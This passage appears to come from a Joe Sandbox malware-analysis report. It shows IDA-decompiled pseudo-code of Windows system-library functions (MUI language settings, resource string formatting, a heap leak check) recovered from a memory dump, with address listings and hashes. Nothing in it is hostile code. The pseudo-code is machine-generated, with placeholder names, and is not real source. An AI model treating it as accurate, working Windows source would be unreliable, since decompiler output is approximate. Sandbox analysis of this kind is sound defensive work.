									if(E33D156E0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									E33D03BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									E33D03BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E33D35050(_t257,  &_v68, _t243);
								if(E33D156E0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = L33D3A8B0(_t278, ";");
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t48 = _v12 + 4; // 0x6
					_t260 = _t48;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = E33D05D90(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						L33D388C0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = L33D3A8B0(_v16, ";");
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E33D35050(_t262,  &_v68, _t244);
								if(E33D156E0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = L33D3A8B0(_t282, ";");
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E33D35050(_t262,  &_v68, _t201);
							if(E33D156E0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							E33D03BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							E33D03BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t26 = _v12 + 4; // 0x6
				_t264 = _t26;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = E33D05D90(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					L33D388C0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = L33D3A8B0(_t280, ";");
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E33D35050(_t267,  &_v68, _t245);
							if(E33D156E0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = L33D3A8B0(_t284, ";");
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E33D35050(_t267,  &_v68, _t224);
						if(E33D156E0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						E33D03BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						E33D03BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































                                                                                                                                                                                            0x33d15117
                                                                                                                                                                                            0x33d1511d
                                                                                                                                                                                            0x33d1511f
                                                                                                                                                                                            0x33d15121
                                                                                                                                                                                            0x33d15124
                                                                                                                                                                                            0x33d15127
                                                                                                                                                                                            0x33d1512a
                                                                                                                                                                                            0x33d1512d
                                                                                                                                                                                            0x33d15130
                                                                                                                                                                                            0x33d15133
                                                                                                                                                                                            0x33d15136
                                                                                                                                                                                            0x33d1513a
                                                                                                                                                                                            0x33d1513c
                                                                                                                                                                                            0x33d15141
                                                                                                                                                                                            0x33d5b9ab
                                                                                                                                                                                            0x33d5b9b0
                                                                                                                                                                                            0x33d15460
                                                                                                                                                                                            0x33d15463
                                                                                                                                                                                            0x33d15469
                                                                                                                                                                                            0x33d1546f
                                                                                                                                                                                            0x33d15475
                                                                                                                                                                                            0x33d1547b
                                                                                                                                                                                            0x33d15481
                                                                                                                                                                                            0x33d15484
                                                                                                                                                                                            0x33d1548a
                                                                                                                                                                                            0x33d15491
                                                                                                                                                                                            0x33d15496
                                                                                                                                                                                            0x33d15496
                                                                                                                                                                                            0x33d1515e
                                                                                                                                                                                            0x33d5b9b7
                                                                                                                                                                                            0x33d5b9c1
                                                                                                                                                                                            0x33d5b9d0
                                                                                                                                                                                            0x33d5b9d0
                                                                                                                                                                                            0x33d5b9d5
                                                                                                                                                                                            0x33d5b9d5
                                                                                                                                                                                            0x33d1517b
                                                                                                                                                                                            0x33d1518a
                                                                                                                                                                                            0x33d15190
                                                                                                                                                                                            0x33d15195
                                                                                                                                                                                            0x33d15195
                                                                                                                                                                                            0x33d151af
                                                                                                                                                                                            0x33d1526f
                                                                                                                                                                                            0x33d15286
                                                                                                                                                                                            0x33d15348
                                                                                                                                                                                            0x33d1535f
                                                                                                                                                                                            0x33d15446
                                                                                                                                                                                            0x33d15446
                                                                                                                                                                                            0x33d15449
                                                                                                                                                                                            0x33d15449
                                                                                                                                                                                            0x33d1544b
                                                                                                                                                                                            0x33d1544f
                                                                                                                                                                                            0x33d5bae9
                                                                                                                                                                                            0x33d5bae9
                                                                                                                                                                                            0x33d15455
                                                                                                                                                                                            0x33d1545a
                                                                                                                                                                                            0x33d5baf5
                                                                                                                                                                                            0x33d5bb08
                                                                                                                                                                                            0x33d5bb0f
                                                                                                                                                                                            0x33d5bb11
                                                                                                                                                                                            0x33d5bb14
                                                                                                                                                                                            0x33d5bb14
                                                                                                                                                                                            0x33d5baf5
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d1545a
                                                                                                                                                                                            0x33d15368
                                                                                                                                                                                            0x33d15368
                                                                                                                                                                                            0x33d1536b
                                                                                                                                                                                            0x33d15370
                                                                                                                                                                                            0x33d5baa5
                                                                                                                                                                                            0x33d5baa7
                                                                                                                                                                                            0x33d15376
                                                                                                                                                                                            0x33d15387
                                                                                                                                                                                            0x33d15389
                                                                                                                                                                                            0x33d1538c
                                                                                                                                                                                            0x33d1538c
                                                                                                                                                                                            0x33d15391
                                                                                                                                                                                            0x33d5baaf
                                                                                                                                                                                            0x33d5bab2
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d15397
                                                                                                                                                                                            0x33d1539c
                                                                                                                                                                                            0x33d153a4
                                                                                                                                                                                            0x33d153b2
                                                                                                                                                                                            0x33d153b5
                                                                                                                                                                                            0x33d153b8
                                                                                                                                                                                            0x33d153fc
                                                                                                                                                                                            0x33d153fc
                                                                                                                                                                                            0x33d15404
                                                                                                                                                                                            0x33d1540b
                                                                                                                                                                                            0x33d1541f
                                                                                                                                                                                            0x33d15421
                                                                                                                                                                                            0x33d15421
                                                                                                                                                                                            0x33d1541f
                                                                                                                                                                                            0x33d15424
                                                                                                                                                                                            0x33d5babf
                                                                                                                                                                                            0x33d5bacc
                                                                                                                                                                                            0x33d5bad1
                                                                                                                                                                                            0x33d5bad4
                                                                                                                                                                                            0x33d1542a
                                                                                                                                                                                            0x33d1542a
                                                                                                                                                                                            0x33d1542a
                                                                                                                                                                                            0x33d1542c
                                                                                                                                                                                            0x33d15431
                                                                                                                                                                                            0x33d1543e
                                                                                                                                                                                            0x33d1543e
                                                                                                                                                                                            0x33d15443
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d15443
                                                                                                                                                                                            0x33d153ba
                                                                                                                                                                                            0x33d153bd
                                                                                                                                                                                            0x33d153bf
                                                                                                                                                                                            0x33d153c2
                                                                                                                                                                                            0x33d153ca
                                                                                                                                                                                            0x33d153de
                                                                                                                                                                                            0x33d153e0
                                                                                                                                                                                            0x33d153e0
                                                                                                                                                                                            0x33d153e7
                                                                                                                                                                                            0x33d153ee
                                                                                                                                                                                            0x33d153f1
                                                                                                                                                                                            0x33d153f2
                                                                                                                                                                                            0x33d153f6
                                                                                                                                                                                            0x33d153f9
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d153f9
                                                                                                                                                                                            0x33d15391
                                                                                                                                                                                            0x33d1528f
                                                                                                                                                                                            0x33d1528f
                                                                                                                                                                                            0x33d15292
                                                                                                                                                                                            0x33d15297
                                                                                                                                                                                            0x33d5ba41
                                                                                                                                                                                            0x33d5ba43
                                                                                                                                                                                            0x33d1529d
                                                                                                                                                                                            0x33d152ae
                                                                                                                                                                                            0x33d152b0
                                                                                                                                                                                            0x33d152b3
                                                                                                                                                                                            0x33d152b3
                                                                                                                                                                                            0x33d152b8
                                                                                                                                                                                            0x33d5ba4b
                                                                                                                                                                                            0x33d5ba4e
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d152be
                                                                                                                                                                                            0x33d152c3
                                                                                                                                                                                            0x33d152c8
                                                                                                                                                                                            0x33d152cb
                                                                                                                                                                                            0x33d152ce
                                                                                                                                                                                            0x33d152dd
                                                                                                                                                                                            0x33d152e0
                                                                                                                                                                                            0x33d152e3
                                                                                                                                                                                            0x33d5ba58
                                                                                                                                                                                            0x33d5ba5b
                                                                                                                                                                                            0x33d5ba5d
                                                                                                                                                                                            0x33d5ba60
                                                                                                                                                                                            0x33d5ba68
                                                                                                                                                                                            0x33d5ba7c
                                                                                                                                                                                            0x33d5ba7e
                                                                                                                                                                                            0x33d5ba7e
                                                                                                                                                                                            0x33d5ba85
                                                                                                                                                                                            0x33d5ba8c
                                                                                                                                                                                            0x33d5ba8f
                                                                                                                                                                                            0x33d5ba90
                                                                                                                                                                                            0x33d5ba94
                                                                                                                                                                                            0x33d5ba97
                                                                                                                                                                                            0x33d5ba97
                                                                                                                                                                                            0x33d152e9
                                                                                                                                                                                            0x33d152ec
                                                                                                                                                                                            0x33d152f1
                                                                                                                                                                                            0x33d152f8
                                                                                                                                                                                            0x33d1530c
                                                                                                                                                                                            0x33d5ba9f
                                                                                                                                                                                            0x33d5ba9f
                                                                                                                                                                                            0x33d1530c
                                                                                                                                                                                            0x33d15314
                                                                                                                                                                                            0x33d15323
                                                                                                                                                                                            0x33d15328
                                                                                                                                                                                            0x33d1532b
                                                                                                                                                                                            0x33d1532b
                                                                                                                                                                                            0x33d1532e
                                                                                                                                                                                            0x33d15333
                                                                                                                                                                                            0x33d15340
                                                                                                                                                                                            0x33d15340
                                                                                                                                                                                            0x33d15345
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d15345
                                                                                                                                                                                            0x33d152b8
                                                                                                                                                                                            0x33d151b8
                                                                                                                                                                                            0x33d151b8
                                                                                                                                                                                            0x33d151bb
                                                                                                                                                                                            0x33d151c0
                                                                                                                                                                                            0x33d5b9dd
                                                                                                                                                                                            0x33d151c6
                                                                                                                                                                                            0x33d151d2
                                                                                                                                                                                            0x33d151d7
                                                                                                                                                                                            0x33d151d9
                                                                                                                                                                                            0x33d151dc
                                                                                                                                                                                            0x33d151dc
                                                                                                                                                                                            0x33d151e1
                                                                                                                                                                                            0x33d5b9e5
                                                                                                                                                                                            0x33d5b9e7
                                                                                                                                                                                            0x33d5b9ec
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d151e7
                                                                                                                                                                                            0x33d151ec
                                                                                                                                                                                            0x33d151f1
                                                                                                                                                                                            0x33d151f4
                                                                                                                                                                                            0x33d15204
                                                                                                                                                                                            0x33d15207
                                                                                                                                                                                            0x33d1520a
                                                                                                                                                                                            0x33d5b9f4
                                                                                                                                                                                            0x33d5b9f7
                                                                                                                                                                                            0x33d5b9f9
                                                                                                                                                                                            0x33d5b9fc
                                                                                                                                                                                            0x33d5ba04
                                                                                                                                                                                            0x33d5ba18
                                                                                                                                                                                            0x33d5ba1a
                                                                                                                                                                                            0x33d5ba1a
                                                                                                                                                                                            0x33d5ba21
                                                                                                                                                                                            0x33d5ba28
                                                                                                                                                                                            0x33d5ba2b
                                                                                                                                                                                            0x33d5ba2c
                                                                                                                                                                                            0x33d5ba30
                                                                                                                                                                                            0x33d5ba33
                                                                                                                                                                                            0x33d5ba33
                                                                                                                                                                                            0x33d15210
                                                                                                                                                                                            0x33d15213
                                                                                                                                                                                            0x33d15218
                                                                                                                                                                                            0x33d1521f
                                                                                                                                                                                            0x33d15233
                                                                                                                                                                                            0x33d5ba3b
                                                                                                                                                                                            0x33d5ba3b
                                                                                                                                                                                            0x33d15233
                                                                                                                                                                                            0x33d1523b
                                                                                                                                                                                            0x33d1524a
                                                                                                                                                                                            0x33d1524f
                                                                                                                                                                                            0x33d15252
                                                                                                                                                                                            0x33d15252
                                                                                                                                                                                            0x33d15255
                                                                                                                                                                                            0x33d1525a
                                                                                                                                                                                            0x33d15267
                                                                                                                                                                                            0x33d15267
                                                                                                                                                                                            0x33d1526c
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d1526c

                                                                                                                                                                                            Strings
                                                                                                                                                                                            • WindowsExcludedProcs, xrefs: 33D1514A
                                                                                                                                                                                            • Kernel-MUI-Language-SKU, xrefs: 33D1534B
                                                                                                                                                                                            • Kernel-MUI-Number-Allowed, xrefs: 33D15167
                                                                                                                                                                                            • Kernel-MUI-Language-Allowed, xrefs: 33D1519B
                                                                                                                                                                                            • Kernel-MUI-Language-Disallowed, xrefs: 33D15272
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                                                                                            • API String ID: 0-258546922
                                                                                                                                                                                            • Opcode ID: 9aec1d932f92eeaa3af5cc7447fd620c76d3ea588c7cc948c0fcc1101079fc1b
                                                                                                                                                                                            • Instruction ID: 4d02311d80dc464437ee8f40a595e4f381019d0628168337e69e89999c74a8e7
                                                                                                                                                                                            • Opcode Fuzzy Hash: 9aec1d932f92eeaa3af5cc7447fd620c76d3ea588c7cc948c0fcc1101079fc1b
                                                                                                                                                                                            • Instruction Fuzzy Hash: 30F15DB6D11219EFDB42CF99D980ADEBBB9FF08A50F54406AE501E7710DB749E01CBA0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D7F9AA Relevance: 6.4, Strings: 5, Instructions: 115COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 96%
                                                                                                                                                                                            			E33D7F9AA(intOrPtr __ecx, signed int __edx, intOrPtr _a4, signed int _a8) {
				signed int _v8;
				char _v140;
				char _v660;
				char* _v664;
				char* _v668;
				char* _v672;
				char* _v676;
				char* _v680;
				signed short _v684;
				intOrPtr _v688;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t39;
				void* _t42;
				void* _t58;
				signed char* _t59;
				signed int* _t66;
				signed char* _t75;
				void* _t77;
				void* _t80;
				signed int _t81;
				void* _t82;

				_t74 = __edx;
				_v8 =  *0x33deb370 ^ _t81;
				_t39 = __ecx;
				_v676 = L"Type:";
				_t78 = 0;
				_v688 = __ecx;
				_t66 = __edx;
				_v672 = L" Name:";
				_t68 = 0x208;
				_v668 = L" Language:";
				_t75 = 0x7ffe0384;
				_v664 = L" Item:";
				if((_a8 & 0x0000000e) == 0) {
					L10:
					if((_a8 & 0x00000001) != 0) {
						_t74 =  &_v660;
						_t71 = _t39;
						_t42 = E33D7F85C(_t39,  &_v660, _t68, _t78, _t78, _t78, _t78);
						_t78 = _t42;
						if(_t42 >= 0) {
							E33D35050(_t71,  &_v684,  &_v660);
							if(E33D03C40() != 0) {
								_t75 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_t74 =  *_t75 & 0x000000ff;
							E33D7FC01( &_v684,  *_t75 & 0x000000ff);
						}
					}
					return L33D34B50(_t78, _t66, _v8 ^ _t81, _t74, _t75, _t78);
				}
				_v684 = 0x2080000;
				_v680 =  &_v660;
				_t77 = 0;
				E33CFFE40(0x208,  &_v684, L"SR - ");
				_t80 =  &_v676 - _t66;
				do {
					E33CFFE40(_t68,  &_v684,  *((intOrPtr*)(_t80 + _t66)));
					_t54 =  *_t66;
					if(( *_t66 & 0xffff0000) == 0 || _t77 == 3) {
						_t68 =  &_v140;
						E33D3F3C0(_t54,  &_v140, 0x40, "true");
						_t82 = _t82 + 0x10;
						_t54 =  &_v140;
					}
					E33CFFE40(_t68,  &_v684, _t54);
					_t77 = _t77 + 1;
					_t66 =  &(_t66[1]);
				} while (_t77 < _a4);
				_t58 = E33D03C40();
				_t75 = 0x7ffe0384;
				if(_t58 == 0) {
					_t59 = 0x7ffe0384;
				} else {
					_t59 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				_t74 =  *_t59 & 0x000000ff;
				E33D7FC01( &_v684,  *_t59 & 0x000000ff);
				_t78 = 0;
				L33D38F40( &_v660, 0, _v684 & 0x0000ffff);
				_t39 = _v688;
				_t68 = 0x208;
				goto L10;
			}


























                                                                                                                                                                                            0x33d7f9aa
                                                                                                                                                                                            0x33d7f9bc
                                                                                                                                                                                            0x33d7f9c1
                                                                                                                                                                                            0x33d7f9c3
                                                                                                                                                                                            0x33d7f9cd
                                                                                                                                                                                            0x33d7f9cf
                                                                                                                                                                                            0x33d7f9d9
                                                                                                                                                                                            0x33d7f9dc
                                                                                                                                                                                            0x33d7f9e6
                                                                                                                                                                                            0x33d7f9eb
                                                                                                                                                                                            0x33d7f9f5
                                                                                                                                                                                            0x33d7f9fa
                                                                                                                                                                                            0x33d7fa04
                                                                                                                                                                                            0x33d7fadb
                                                                                                                                                                                            0x33d7fadf
                                                                                                                                                                                            0x33d7fae6
                                                                                                                                                                                            0x33d7faec
                                                                                                                                                                                            0x33d7faee
                                                                                                                                                                                            0x33d7faf3
                                                                                                                                                                                            0x33d7faf7
                                                                                                                                                                                            0x33d7fb07
                                                                                                                                                                                            0x33d7fb13
                                                                                                                                                                                            0x33d7fb1e
                                                                                                                                                                                            0x33d7fb1e
                                                                                                                                                                                            0x33d7fb24
                                                                                                                                                                                            0x33d7fb2d
                                                                                                                                                                                            0x33d7fb2d
                                                                                                                                                                                            0x33d7faf7
                                                                                                                                                                                            0x33d7fb42
                                                                                                                                                                                            0x33d7fb42
                                                                                                                                                                                            0x33d7fa10
                                                                                                                                                                                            0x33d7fa1a
                                                                                                                                                                                            0x33d7fa20
                                                                                                                                                                                            0x33d7fa2e
                                                                                                                                                                                            0x33d7fa39
                                                                                                                                                                                            0x33d7fa3b
                                                                                                                                                                                            0x33d7fa45
                                                                                                                                                                                            0x33d7fa4a
                                                                                                                                                                                            0x33d7fa51
                                                                                                                                                                                            0x33d7fa5c
                                                                                                                                                                                            0x33d7fa64
                                                                                                                                                                                            0x33d7fa69
                                                                                                                                                                                            0x33d7fa6c
                                                                                                                                                                                            0x33d7fa6c
                                                                                                                                                                                            0x33d7fa7a
                                                                                                                                                                                            0x33d7fa7f
                                                                                                                                                                                            0x33d7fa80
                                                                                                                                                                                            0x33d7fa83
                                                                                                                                                                                            0x33d7fa88
                                                                                                                                                                                            0x33d7fa8d
                                                                                                                                                                                            0x33d7fa94
                                                                                                                                                                                            0x33d7faa6
                                                                                                                                                                                            0x33d7fa96
                                                                                                                                                                                            0x33d7fa9f
                                                                                                                                                                                            0x33d7fa9f
                                                                                                                                                                                            0x33d7faa8
                                                                                                                                                                                            0x33d7fab1
                                                                                                                                                                                            0x33d7fabd
                                                                                                                                                                                            0x33d7fac8
                                                                                                                                                                                            0x33d7facd
                                                                                                                                                                                            0x33d7fad6
                                                                                                                                                                                            0x00000000

                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: Item:$ Language:$ Name:$SR - $Type:
                                                                                                                                                                                            • API String ID: 0-3082644519
                                                                                                                                                                                            • Opcode ID: ed90bdd216586f5e608b498a4a7d6aee29cc7ef822ad0f01770d78cbb3a022cf
                                                                                                                                                                                            • Instruction ID: efa4eae1395482f294a487f5579da521a15de11f07cf577afacf3d3c61d672c9
                                                                                                                                                                                            • Opcode Fuzzy Hash: ed90bdd216586f5e608b498a4a7d6aee29cc7ef822ad0f01770d78cbb3a022cf
                                                                                                                                                                                            • Instruction Fuzzy Hash: 1F416D71A01228ABCB21CF64CC58B9AB7BDEF46714F4442D5E558EB640DE349E848F61
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D1D8F0 Relevance: 6.4, Strings: 5, Instructions: 108COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 33%
                                                                                                                                                                                            			E33D1D8F0() {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t25;
				signed int _t26;
				signed int _t29;
				signed int _t35;
				void* _t55;
				char* _t56;
				void* _t58;
				signed int _t68;
				void* _t70;
				signed int _t71;

				_t25 =  *[fs:0x30];
				if(( *(_t25 + 0x68) & 0x00000100) != 0) {
					L4:
					return _t25;
				}
				_t25 =  *[fs:0x30];
				if(( *(_t25 + 0x68) & 0x02000000) != 0 ||  *0x33de4898 == 0 && ( *0x33de6944 & 0x00000003) == 0) {
					goto L4;
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(3);
					 *0x33de6d5c = 0;
					_t25 = L33D00F90(_t55, 0, _t70, __eflags);
					 *0x33de47d8 = _t25;
					__eflags = _t25;
					if(_t25 == 0) {
						goto L4;
					}
					_t71 =  *[fs:0x30];
					_t56 = "HEAP: ";
					_t26 =  *[fs:0x30];
					__eflags =  *(_t26 + 0xc);
					if( *(_t26 + 0xc) == 0) {
						_push(_t56);
						E33CEB910();
					} else {
						E33CEB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push("Inspecting leaks at process shutdown ...\n");
					E33CEB910();
					_pop(_t58);
					_t29 = L33D9E993(_t58, _t68);
					__eflags = _t29;
					if(_t29 != 0) {
						 *0x33de6d58 =  *((intOrPtr*)( *((intOrPtr*)(_t71 + 0x90)) +  *(_t71 + 0x88) * 4 - 4));
						L33D9EC84();
						L33D9EE54(_t56, 0, _t71, __eflags);
						E33CEF8B0(_t68,  *0x33de47d8);
						_t35 =  *[fs:0x30];
						 *0x33de47d8 = 0;
						__eflags =  *0x33de6d5c; // 0x0
						if(__eflags == 0) {
							__eflags =  *(_t35 + 0xc);
							if( *(_t35 + 0xc) == 0) {
								_push(_t56);
								E33CEB910();
							} else {
								E33CEB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("No leaks detected.\n");
							return E33CEB910();
						}
						__eflags =  *(_t35 + 0xc);
						if( *(_t35 + 0xc) == 0) {
							_push(_t56);
							E33CEB910();
						} else {
							E33CEB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_t25 = E33CEB910("%ld leaks detected.\n",  *0x33de6d5c);
						__eflags =  *0x33de6944 & 0x00000002;
						if(( *0x33de6944 & 0x00000002) == 0) {
							goto L4;
						} else {
							asm("int3");
							return _t25;
						}
					} else {
						return E33CEF8B0(_t68,  *0x33de47d8);
					}
				}
			}
















                                                                                                                                                                                            0x33d1d8f0
                                                                                                                                                                                            0x33d1d900
                                                                                                                                                                                            0x33d1d92e
                                                                                                                                                                                            0x33d1d92e
                                                                                                                                                                                            0x33d1d92e
                                                                                                                                                                                            0x33d1d902
                                                                                                                                                                                            0x33d1d90f
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d5f16f
                                                                                                                                                                                            0x33d5f171
                                                                                                                                                                                            0x33d5f172
                                                                                                                                                                                            0x33d5f173
                                                                                                                                                                                            0x33d5f174
                                                                                                                                                                                            0x33d5f175
                                                                                                                                                                                            0x33d5f176
                                                                                                                                                                                            0x33d5f178
                                                                                                                                                                                            0x33d5f17e
                                                                                                                                                                                            0x33d5f183
                                                                                                                                                                                            0x33d5f188
                                                                                                                                                                                            0x33d5f18a
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d5f190
                                                                                                                                                                                            0x33d5f197
                                                                                                                                                                                            0x33d5f19c
                                                                                                                                                                                            0x33d5f1a2
                                                                                                                                                                                            0x33d5f1a5
                                                                                                                                                                                            0x33d5f1c4
                                                                                                                                                                                            0x33d5f1c5
                                                                                                                                                                                            0x33d5f1a7
                                                                                                                                                                                            0x33d5f1bc
                                                                                                                                                                                            0x33d5f1c1
                                                                                                                                                                                            0x33d5f1cb
                                                                                                                                                                                            0x33d5f1d0
                                                                                                                                                                                            0x33d5f1d5
                                                                                                                                                                                            0x33d5f1d6
                                                                                                                                                                                            0x33d5f1db
                                                                                                                                                                                            0x33d5f1dd
                                                                                                                                                                                            0x33d5f1ff
                                                                                                                                                                                            0x33d5f204
                                                                                                                                                                                            0x33d5f209
                                                                                                                                                                                            0x33d5f214
                                                                                                                                                                                            0x33d5f219
                                                                                                                                                                                            0x33d5f21f
                                                                                                                                                                                            0x33d5f225
                                                                                                                                                                                            0x33d5f22b
                                                                                                                                                                                            0x33d5f27b
                                                                                                                                                                                            0x33d5f27e
                                                                                                                                                                                            0x33d5f29d
                                                                                                                                                                                            0x33d5f29e
                                                                                                                                                                                            0x33d5f280
                                                                                                                                                                                            0x33d5f295
                                                                                                                                                                                            0x33d5f29a
                                                                                                                                                                                            0x33d5f2a4
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d5f2ae
                                                                                                                                                                                            0x33d5f22d
                                                                                                                                                                                            0x33d5f230
                                                                                                                                                                                            0x33d5f24f
                                                                                                                                                                                            0x33d5f250
                                                                                                                                                                                            0x33d5f232
                                                                                                                                                                                            0x33d5f247
                                                                                                                                                                                            0x33d5f24c
                                                                                                                                                                                            0x33d5f261
                                                                                                                                                                                            0x33d5f266
                                                                                                                                                                                            0x33d5f26f
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d5f275
                                                                                                                                                                                            0x33d5f275
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d5f275
                                                                                                                                                                                            0x33d5f1df
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d5f1e5
                                                                                                                                                                                            0x33d5f1dd

                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: %ld leaks detected.$HEAP: $HEAP[%wZ]: $Inspecting leaks at process shutdown ...$No leaks detected.
                                                                                                                                                                                            • API String ID: 0-1155200129
                                                                                                                                                                                            • Opcode ID: c344f8535f38b06cc945ff2823cad6ded8a8aa5d8b65a30fa544651490a4b5d0
                                                                                                                                                                                            • Instruction ID: 6e52864709325faebf7d1d5fd9ff41bd20e10887b6ac701f02c206e4b8bd1b86
